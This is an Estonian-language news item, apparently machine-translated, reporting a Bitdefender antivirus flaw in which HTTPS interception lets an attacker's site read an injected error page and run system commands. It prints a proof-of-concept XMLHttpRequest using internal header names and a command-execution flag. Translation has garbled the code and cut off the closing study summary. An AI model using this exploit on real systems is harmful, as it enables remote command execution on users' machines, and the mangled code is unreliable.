Vladimir Palant, Adblock Plusi looja,
Probleemi põhjuseks on see, et Bitdefenderi viirusetõrje teostab HTTPS-liikluse kohaliku pealtkuulamise, asendades saidi algse TLS-sertifikaadi. Kliendi süsteemi paigaldatakse täiendav juursertifikaat, mis võimaldab varjata kasutatava liiklusjärelevalvesüsteemi tööd. Viirusetõrje kiilub end kaitstud liiklusesse ja lisab Safe Search funktsiooni rakendamiseks mõnele lehele oma JavaScripti koodi ning turvalise ühenduse sertifikaadiga seotud probleemide korral asendab tagastatud vealehe enda omaga. Kuna uut vealehte serveeritakse avatava serveri nimel, on selle serveri teistel lehtedel täielik juurdepääs Bitdefenderi sisestatud sisule.
Ründaja kontrollitud saidi avamisel võib see sait saata XMLHttpRequesti ja vastamisel teeselda HTTPS-i sertifikaadiga seotud probleeme, mis toob kaasa Bitdefenderi poolt võltsitud vealehe. Kuna vealeht avatakse ründaja domeeni kontekstis, saab ta lugeda võltsitud lehe sisu Bitdefenderi parameetritega. Bitdefenderi pakutav leht sisaldab ka seansivõtit, mis võimaldab kasutada sisemist Bitdefender API-t, et käivitada eraldi Safepay brauseri seanss, määrates suvalised käsurea lipud, ja käivitada mis tahes süsteemikäsud, kasutades "--utility-cmd-prefix" lipp. Kasutamise näide (param1 ja param2 on vealehelt saadud väärtused):
var päring = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Sisutüüp", "Application/x-www-vorm-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Meenutagem, et 2017. aastal läbi viidud uuring
Ainult 11 tootest 26-st pakkusid praeguseid šifrikomplekte. 5 süsteemi ei kontrollinud sertifikaate (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security ja Total Security tooted olid rünnaku all
Allikas: opennet.ru